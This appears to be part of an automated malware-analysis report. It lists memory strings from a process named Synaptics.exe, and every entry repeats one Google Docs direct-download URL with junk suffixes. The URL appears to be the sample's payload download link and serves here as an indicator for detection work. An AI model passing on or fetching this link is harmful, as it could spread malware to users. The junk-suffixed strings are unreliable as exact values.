                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUpdat
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUser
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV?
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVAgs
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVlVsO
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW;Y
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWv
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2293703674.000000001D3BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2275741139.00000000148FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXA6tA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXJ6
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXO6~
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYHhs
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ#
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ_
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_p
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_u
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-wow
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaNh
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada_
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada~
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbd
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbe
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcA
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcFh
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcdMsD
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellb_
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellet
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadct
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcting
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcume3
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D76F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddB
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddG
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddH
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddesk
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds.cn
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade;
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded.m
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem:e
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemuJ
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyoY
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesolv
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf:
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfF
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfK
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfSVlAF
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfeNrr
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgY#ttu
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgcpcd
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoVf
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgr
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgw
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh3c
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh?2s
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhF&wM
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhK&z
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhts-cn.net
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadient
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadipt
